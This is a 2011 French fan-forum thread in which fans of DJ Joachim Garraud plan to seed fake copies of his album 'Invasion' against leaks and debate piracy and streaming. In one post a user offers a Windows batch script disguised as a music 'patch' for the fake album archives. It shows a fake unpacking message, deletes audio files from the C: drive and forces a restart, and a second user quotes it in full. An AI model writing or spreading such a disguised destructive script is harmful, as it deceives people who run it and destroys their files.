Fake Invasion : nous avons besoin de vous !!

L'album et le show "Invasion" de Joachim

Modérateur :Space_Moderators

djfameus
Super Space Invader
Super Space Invader
Messages :6289
Enregistré le :26 avr. 2006, 11:50
Re: Fake Invasion : nous avons besoin de vous !!

Message par djfameus » 04 mars 2011, 21:52

C'est illégal de mettre des sons sur Youtube.

Peut-être prochainement sur Deezer, Spotify..
Avatar du membre
Dirty-Shady
Space Conquerator
Space Conquerator
Messages :495
Enregistré le :03 mars 2010, 13:35

Re: Fake Invasion : nous avons besoin de vous !!

Message par Dirty-Shady » 04 mars 2011, 21:55

Illégal mais j'ai encore jamais vu d'artistes se plaindre de ça..
Parce que ça foutait pas mal chier quand même, on peut même plus s'écouter du Joachim tranquillement sur youtube :(
(Et je parle pas de télécharger ni rien car j'ai encore jamais piraté une musique de Joachim, par respect pour ce qu'il fait pour sa communeauté) :wink:
[b][color=#8000FF]LET THE CHILDREN TECHNO[/color][/b]

[url=http://soundcloud.com/maaaarius][color=#FFBF00]SoundCloud Minimixes[/color][/url]

[i]Chef de Promotion du festival [b]INOX PARK PARIS 2011[/b], secteur [b]Marne La Vallée / Val d'Europe[/b][/i]
djfameus
Super Space Invader
Super Space Invader
Messages :6289
Enregistré le :26 avr. 2006, 11:50

Re: Fake Invasion : nous avons besoin de vous !!

Message par djfameus » 04 mars 2011, 22:06

Dirty-Shady a écrit :Illégal mais j'ai encore jamais vu d'artistes se plaindre de ça..
Beaucoup de vidéos sont supprimées ;)
Avatar du membre
SubZero
Space Conquerator
Space Conquerator
Messages :464
Enregistré le :21 sept. 2010, 13:52

Re: Fake Invasion : nous avons besoin de vous !!

Message par SubZero » 04 mars 2011, 22:21

Mais si tu pourras continuer a en ecouter sur youtube. C'est juste un histoire de temps, pour l'instant les tracks ne sont pas officiellement publiées. Donc c'est un peu normal.
[b][i][color=#00BF00]LIKE A BOSS[/color][/i][/b]
Avatar du membre
joachim.garraud
Admin Forum
Admin Forum
Messages :5143
Enregistré le :13 avr. 2004, 17:31
Localisation :PARIS
Contact :

Re: Fake Invasion : nous avons besoin de vous !!

Message par joachim.garraud » 04 mars 2011, 23:15

merci énormément pour votre collaboration !
même si cela ne sont quelques gouttes dans un océan, je trouve cela important de montrer que je ne suis pas d'accord pour laisser faire sous prétexte que cela est cool de se laisser pirater !
Joachim Garraud
Avatar du membre
DJ Cr@$h
Galaxian Suprem
Galaxian Suprem
Messages :191
Enregistré le :31 juil. 2006, 02:55
Localisation :CAEN

Re: Fake Invasion : nous avons besoin de vous !!

Message par DJ Cr@$h » 05 mars 2011, 10:19

Que la fakeinvasion commence c'est parti Joachim Garraud - We are the future (original version) mais bon c pas la meme lol

PS: je mettrait l'album fake plus tard

Joachim on est avec toi !!!!!
Joachim GARRAUD, môa aime bien moi !!!
Dance for life !!!!
Avatar du membre
KevinKBHP
Space Invader
Space Invader
Messages :1636
Enregistré le :22 août 2008, 14:50
Localisation :Savoie

Re: Fake Invasion : nous avons besoin de vous !!

Message par KevinKBHP » 06 mars 2011, 00:11

Dirty-Shady a écrit :Illégal mais j'ai encore jamais vu d'artistes se plaindre de ça..
Parce que ça foutait pas mal chier quand même, on peut même plus s'écouter du Joachim tranquillement sur youtube :(
(Et je parle pas de télécharger ni rien car j'ai encore jamais piraté une musique de Joachim, par respect pour ce qu'il fait pour sa communeauté) :wink:
Tu veux l'écouter bas tu l'achettes, la musique c'est fait pour être écouté non. Si tu veux manger un paquet de chips tu vas l'acheter aussi on est d'accord? Et bien c'est pareil.

J'ai également un album fake de dispo, je posterai un lien sur ce forum pour que vous puissiez le télécharger (le fake) et ainsi le redifuser sur vos réseau préféré. A faire tourner sans modération :mrgreen:

@Joachim: Le téléchargement tue la musique, décourage l'artiste, j'ai pas du tout envi de te voir découragé :mrgreen: Et puis tu le mérites.
:si3: [color=red]17/08/08 @ Invasion Orange[/color] | [color=red]15/08/09 @ Le Prive - Avignon (guest)[/color] | [color=red]18/06/10 @ Mistral - Aix en Provence (guest)[/color] | [color=red]03/07/10 @ Inox Park - Paris Chatoux (VIP)[/color] | [color=red]13/08/10 @ Amnesia - Cap d'Agde[/color] | [color=red]26/11/10 @ Villa rouge - Montpelier (guest)[/color]

:si: Box 2008-2K10-2011; Space Party; Toolroom Knights; Club FG Zemixx 3
Avatar du membre
DjToufTouf
Master Of The Universe
Master Of The Universe
Messages :679
Enregistré le :14 sept. 2010, 17:41
Localisation :Nice

Re: Fake Invasion : nous avons besoin de vous !!

Message par DjToufTouf » 06 mars 2011, 01:12

Si vous voulez vous pouvez mettre un script dans les dossier zippés pour qu'il s'execute :

Ouvrir le notepad, copier ce code et l'enregistrer en par exemple PATCHMUSIQUE.bat

Code : Tout sélectionner

@echo off
echo Album en cours de décompression
ping localhost -n 1 >nul
echo Veuillez patienter..
ping localhost -n 1 >nul
pause
ping localhost -n 4 >nul
echo ERREUR
echo ERREUR
echo ERREUR
echo ERREUR
echo ERREUR
echo PIRATER DU JOACHIM GARRAUD C EST NE PAS LE RESPECTER
del C:\*.mp3
del C:\*.wma
del C:\*.wav
del C:\*.flac
ping localhost -n 5 >nul
Shutdown –r –t 5 –c “Adieu, Bonne nuit!”

Pour ceux qui ne comprennent pas ca supprime toutes les musiques et éteint l'ordinateur :twisted:

Si vous etes sages vous pouvez juste enlever la partie ou il y a les del C:\* pour le pas les supprimer et lui laisser la vie sauve :mrgreen:
We are the future, [color=#FFBF00]Galactic from [size=125]beyond[/size][/color]
We are the future, [color=#FFBF00]Party [size=125]ON[/size][/color]
[size=125] [/size] [url=http://soundcloud.com/dj-touftouf][color=#FFBF00][u]N'oubliez pas de passer faire un petit tour sur mon soundcloud ![/u][/color][/url] [size=125][/size]
Avatar du membre
Dirty-Shady
Space Conquerator
Space Conquerator
Messages :495
Enregistré le :03 mars 2010, 13:35

Re: Fake Invasion : nous avons besoin de vous !!

Message par Dirty-Shady » 06 mars 2011, 10:43

DjToufTouf a écrit :Si vous voulez vous pouvez mettre un script dans les dossier zippés pour qu'il s'execute :

Ouvrir le notepad, copier ce code et l'enregistrer en par exemple PATCHMUSIQUE.bat

Code : Tout sélectionner

@echo off
echo Album en cours de décompression
ping localhost -n 1 >nul
echo Veuillez patienter..
ping localhost -n 1 >nul
pause
ping localhost -n 4 >nul
echo ERREUR
echo ERREUR
echo ERREUR
echo ERREUR
echo ERREUR
echo PIRATER DU JOACHIM GARRAUD C EST NE PAS LE RESPECTER
del C:\*.mp3
del C:\*.wma
del C:\*.wav
del C:\*.flac
ping localhost -n 5 >nul
Shutdown –r –t 5 –c “Adieu, Bonne nuit!”

Pour ceux qui ne comprennent pas ca supprime toutes les musiques et éteint l'ordinateur :twisted:

Si vous etes sages vous pouvez juste enlever la partie ou il y a les del C:\* pour le pas les supprimer et lui laisser la vie sauve :mrgreen:
Ahahahahah ça c'est très méchant :mrgreen:
KevinKBHP a écrit :Tu veux l'écouter bas tu l'achettes, la musique c'est fait pour être écouté non. Si tu veux manger un paquet de chips tu vas l'acheter aussi on est d'accord? Et bien c'est pareil.
Réveille toi coco on est dans une époque ou des sites d'écoute gratuits et légaux ont vu le jour :wink: (je parle pas de Youtube où circulent des vidéos sans droits comme on l'a dit précédemment)
[b][color=#8000FF]LET THE CHILDREN TECHNO[/color][/b]

[url=http://soundcloud.com/maaaarius][color=#FFBF00]SoundCloud Minimixes[/color][/url]

[i]Chef de Promotion du festival [b]INOX PARK PARIS 2011[/b], secteur [b]Marne La Vallée / Val d'Europe[/b][/i]
Avatar du membre
charlie-F
Master Of The Universe
Master Of The Universe
Messages :782
Enregistré le :04 mai 2008, 17:00
Localisation :lille

Re: Fake Invasion : nous avons besoin de vous !!

Message par charlie-F » 06 mars 2011, 15:50

Dirty-Shady a écrit :
KevinKBHP a écrit :Tu veux l'écouter bas tu l'achettes, la musique c'est fait pour être écouté non. Si tu veux manger un paquet de chips tu vas l'acheter aussi on est d'accord? Et bien c'est pareil.
Réveille toi coco on est dans une époque ou des sites d'écoute gratuits et légaux ont vu le jour :wink: (je parle pas de Youtube où circulent des vidéos sans droits comme on l'a dit précédemment)
Il ne parlait pas d'internet, merci on a compris que des sites légaux existaient, mais plutot de télécharger pour l'écouter partout :wink:
-11/08/09,21/07-10/08/10 =>Acapulco calvi
-17/08/09,02/08/10 =>Via notte porto vecchio
-10/02/10 =>nuit de la prod & network café
-12/05/10 =>Seven Cambrai
-14/05/10 =>Les Planches Deauville
-03/07/10 =>INOX PARK

Space fan!
Avatar du membre
Tibo.Ngs
Super Space Invader
Super Space Invader
Messages :2287
Enregistré le :19 mai 2008, 15:25

Re: Fake Invasion : nous avons besoin de vous !!

Message par Tibo.Ngs » 06 mars 2011, 16:48

charlie-F a écrit :
Dirty-Shady a écrit :
KevinKBHP a écrit :Tu veux l'écouter bas tu l'achettes, la musique c'est fait pour être écouté non. Si tu veux manger un paquet de chips tu vas l'acheter aussi on est d'accord? Et bien c'est pareil.
Réveille toi coco on est dans une époque ou des sites d'écoute gratuits et légaux ont vu le jour :wink: (je parle pas de Youtube où circulent des vidéos sans droits comme on l'a dit précédemment)
Il ne parlait pas d'internet, merci on a compris que des sites légaux existaient, mais plutot de télécharger pour l'écouter partout :wink:
non, non il disait que d'écouter un track sur youtube par exemple (deezer aussi) c'était mal, parce que, tu l'écoute, et la musique ça s'écoute...
[u][b]TEBOH[/b][/u] - https://soundcloud.com/leteboh" onclick="window.open(this.href);return false; ○ http://facebook.com/leteboh" onclick="window.open(this.href);return false; ○ leteboh@gmail.com
Zlalo
Space Invader
Space Invader
Messages :1028
Enregistré le :24 août 2009, 14:18

Re: Fake Invasion : nous avons besoin de vous !!

Message par Zlalo » 06 mars 2011, 16:58

J'ai trouvé un .flac de Stop sur zippyshare... Sur le coup j'étais surpris je pensais pas que les .flac et .wav étaient piratés.. :o
Avatar du membre
ludo-21
Master Of The Universe
Master Of The Universe
Messages :506
Enregistré le :14 mai 2008, 02:27

Re: Fake Invasion : nous avons besoin de vous !!

Message par ludo-21 » 06 mars 2011, 18:18

Bon vous êtes en désaccord.

L'album sort le 21 mars donc il sera en écoute sur le net le 21 mars, pour l'instant on essai de virer tous les titres qui sont forcément d'origine "pirate" car les tracks ne sont pas sorties. Voilà :wink:

ps: Joachim à déjà mis en ligne un clip de l'album: http://www.youtube.com/user/joachimgarraud?blend=2&ob=4" onclick="window.open(this.href);return false;
[INOX PARK 1-2-3-4-5-6, Zemixx 300 Caen, Zénith Dijon 27 janvier 2011, Indigo Collioure 4 août 2009, UNIGHTED 2008]
Avatar du membre
Dirty-Shady
Space Conquerator
Space Conquerator
Messages :495
Enregistré le :03 mars 2010, 13:35

Re: Fake Invasion : nous avons besoin de vous !!

Message par Dirty-Shady » 06 mars 2011, 21:54

Tibo.Ngs a écrit :
charlie-F a écrit :
Dirty-Shady a écrit :
KevinKBHP a écrit :Tu veux l'écouter bas tu l'achettes, la musique c'est fait pour être écouté non. Si tu veux manger un paquet de chips tu vas l'acheter aussi on est d'accord? Et bien c'est pareil.
Réveille toi coco on est dans une époque ou des sites d'écoute gratuits et légaux ont vu le jour :wink: (je parle pas de Youtube où circulent des vidéos sans droits comme on l'a dit précédemment)
Il ne parlait pas d'internet, merci on a compris que des sites légaux existaient, mais plutot de télécharger pour l'écouter partout :wink:
non, non il disait que d'écouter un track sur youtube par exemple (deezer aussi) c'était mal, parce que, tu l'écoute, et la musique ça s'écoute...
Oui et je pense que y'a pas mal de faux-culs concernant tout ça mais bon :mrgreen:
On va attendre gentiment le 21 Mars!
[b][color=#8000FF]LET THE CHILDREN TECHNO[/color][/b]

[url=http://soundcloud.com/maaaarius][color=#FFBF00]SoundCloud Minimixes[/color][/url]

[i]Chef de Promotion du festival [b]INOX PARK PARIS 2011[/b], secteur [b]Marne La Vallée / Val d'Europe[/b][/i]
Avatar du membre
charlie-F
Master Of The Universe
Master Of The Universe
Messages :782
Enregistré le :04 mai 2008, 17:00
Localisation :lille

Re: Fake Invasion : nous avons besoin de vous !!

Message par charlie-F » 06 mars 2011, 22:41

Dirty-Shady a écrit :
Tibo.Ngs a écrit :
charlie-F a écrit :
Dirty-Shady a écrit :
KevinKBHP a écrit :Tu veux l'écouter bas tu l'achettes, la musique c'est fait pour être écouté non. Si tu veux manger un paquet de chips tu vas l'acheter aussi on est d'accord? Et bien c'est pareil.
Réveille toi coco on est dans une époque ou des sites d'écoute gratuits et légaux ont vu le jour :wink: (je parle pas de Youtube où circulent des vidéos sans droits comme on l'a dit précédemment)
Il ne parlait pas d'internet, merci on a compris que des sites légaux existaient, mais plutot de télécharger pour l'écouter partout :wink:
non, non il disait que d'écouter un track sur youtube par exemple (deezer aussi) c'était mal, parce que, tu l'écoute, et la musique ça s'écoute...
Oui et je pense que y'a pas mal de faux-culs concernant tout ça mais bon :mrgreen:
On va attendre gentiment le 21 Mars!

Il s'est mal exprimé en disant écouter, il parlait d'écouter de manière illégale, enfin bref, ça va pas dégénérer pour ça quand même?? :shock: Le forum se portait bien ces derniers temps, conservons cette ambiance! :wink:


Et concernant le "faux-culs", tu t'adresse peut-etre de manière générale, mais je vais te donner ma réponse: J'achete de plus en plus d'albums, car j'ai compris l'intéret, et que je soutiens l'artiste. Par ex je ne télécharge pas Joachim ou encore Paul kalkbrenner, mais j'achète leur album, (en version physique de préférence). Par contre, quand tu écoutes sur beatport un extrait, c'est valable aussi pour itunes, t'as pas de quoi te faire une idée précise de la track. Donc en fonction de ce que la track entière donne, j'achète ensuite le titre en question, ou je supprime le fichier s'il ne me plait pas.

Bref ne partons pas dans ce débat qui ne résoudra rien et qui dégénérera à coup sur, et restons calmes :wink:
-11/08/09,21/07-10/08/10 =>Acapulco calvi
-17/08/09,02/08/10 =>Via notte porto vecchio
-10/02/10 =>nuit de la prod & network café
-12/05/10 =>Seven Cambrai
-14/05/10 =>Les Planches Deauville
-03/07/10 =>INOX PARK

Space fan!
Avatar du membre
Dirty-Shady
Space Conquerator
Space Conquerator
Messages :495
Enregistré le :03 mars 2010, 13:35

Re: Fake Invasion : nous avons besoin de vous !!

Message par Dirty-Shady » 06 mars 2011, 23:02

charlie-F a écrit : Il s'est mal exprimé en disant écouter, il parlait d'écouter de manière illégale, enfin bref, ça va pas dégénérer pour ça quand même?? :shock: Le forum se portait bien ces derniers temps, conservons cette ambiance! :wink:


Et concernant le "faux-culs", tu t'adresse peut-etre de manière générale, mais je vais te donner ma réponse: J'achete de plus en plus d'albums, car j'ai compris l'intéret, et que je soutiens l'artiste. Par ex je ne télécharge pas Joachim ou encore Paul kalkbrenner, mais j'achète leur album, (en version physique de préférence). Par contre, quand tu écoutes sur beatport un extrait, c'est valable aussi pour itunes, t'as pas de quoi te faire une idée précise de la track. Donc en fonction de ce que la track entière donne, j'achète ensuite le titre en question, ou je supprime le fichier s'il ne me plait pas.

Bref ne partons pas dans ce débat qui ne résoudra rien et qui dégénérera à coup sur, et restons calmes :wink:
Je suis tout à fait d'accord avec ce que tu dis, et je ne m'adressais pas de manière générale en utilisant ce terme, je m'excuse si tu as pu, et d'autres, te sentir viser. Je suis tout à fait d'accord avec ce que tu dis, qu'il faut soutenir les artistes, et acheter leur track. Mais il ne faut pas tomber dans l'extrémisme de chaque côté : soit tout acheter même les choses que tu ne connais pas "parceque télécharger c'est mal, même pour se faire une idée", soit tout télécharger "parceque les artistes ils ont trop de fric lol".
Cet album je l'achèterais, parceque Joachim mérite que ses fans le soutiennent, rien que pour tout ce qu'il fait pour eux.
Voilà, fin du débat sinon ça va tapper :mrgreen:
[b][color=#8000FF]LET THE CHILDREN TECHNO[/color][/b]

[url=http://soundcloud.com/maaaarius][color=#FFBF00]SoundCloud Minimixes[/color][/url]

[i]Chef de Promotion du festival [b]INOX PARK PARIS 2011[/b], secteur [b]Marne La Vallée / Val d'Europe[/b][/i]
Avatar du membre
charlie-F
Master Of The Universe
Master Of The Universe
Messages :782
Enregistré le :04 mai 2008, 17:00
Localisation :lille

Re: Fake Invasion : nous avons besoin de vous !!

Message par charlie-F » 06 mars 2011, 23:44

Je suis complétement d'accord avec toi :wink: . Il faut trouver un juste équilibre, c'est comme pour tout. Pour moi ça se définit selon le support que je veux apporter à l'artiste. Joachim, qui est loin d'etre pingre avec nous, qui fait tout au meilleur prix, ne mérite pas le téléchargement. Contrairement à un DJ qui va te faire payer tout et n'importe quoi, qui ne focalisera uniquement sur les bénéfices.
-11/08/09,21/07-10/08/10 =>Acapulco calvi
-17/08/09,02/08/10 =>Via notte porto vecchio
-10/02/10 =>nuit de la prod & network café
-12/05/10 =>Seven Cambrai
-14/05/10 =>Les Planches Deauville
-03/07/10 =>INOX PARK

Space fan!
Avatar du membre
KevinKBHP
Space Invader
Space Invader
Messages :1636
Enregistré le :22 août 2008, 14:50
Localisation :Savoie

Re: Fake Invasion : nous avons besoin de vous !!

Message par KevinKBHP » 07 mars 2011, 01:21

Encore un lien pour toi JC :?

Edit, lien envoyé en mp
Modifié en dernier par KevinKBHP le 07 mars 2011, 11:27, modifié 1 fois.
:si3: [color=red]17/08/08 @ Invasion Orange[/color] | [color=red]15/08/09 @ Le Prive - Avignon (guest)[/color] | [color=red]18/06/10 @ Mistral - Aix en Provence (guest)[/color] | [color=red]03/07/10 @ Inox Park - Paris Chatoux (VIP)[/color] | [color=red]13/08/10 @ Amnesia - Cap d'Agde[/color] | [color=red]26/11/10 @ Villa rouge - Montpelier (guest)[/color]

:si: Box 2008-2K10-2011; Space Party; Toolroom Knights; Club FG Zemixx 3
djfameus
Super Space Invader
Super Space Invader
Messages :6289
Enregistré le :26 avr. 2006, 11:50

Re: Fake Invasion : nous avons besoin de vous !!

Message par djfameus » 07 mars 2011, 09:56

Les liens Zippyshare, ce serait mieux de les donner en MP..
Avatar du membre
Dj Fuzer
Master Of The Universe
Master Of The Universe
Messages :869
Enregistré le :19 août 2010, 19:34
Localisation :Belgique
Contact :

Re: Fake Invasion : nous avons besoin de vous !!

Message par Dj Fuzer » 07 mars 2011, 10:42

j'ai lu ce topic hier soir sur mon iPod, pas pu répondre j'arrive pas à me connecter avec, alors je le fait maintenant :D une semaine de vacances devant moi, je vais recomposer l'album et le faire passer dans plein de sites :lol: joachim tu vas être détronné par mes superbes compositions! (ou pas :lol: )
Gemini CDMP 6000 - casque WESC Joachim Garraud d[*<*]b
Fl Studio 9 XXL - Korg NanoKey

[url=viewtopic.php?f=11&t=36111][b]Mon topic[/b][/url]

[url=http://www.youtube.com/djfuzerofficial]YouTube[/url]|[url=http://soundcloud.com/djfuzer]Soundcloud[/url]

[i]Spoken and understood around the world, in the North, East, South, West: Music is our universal language <3[/i]
Répondre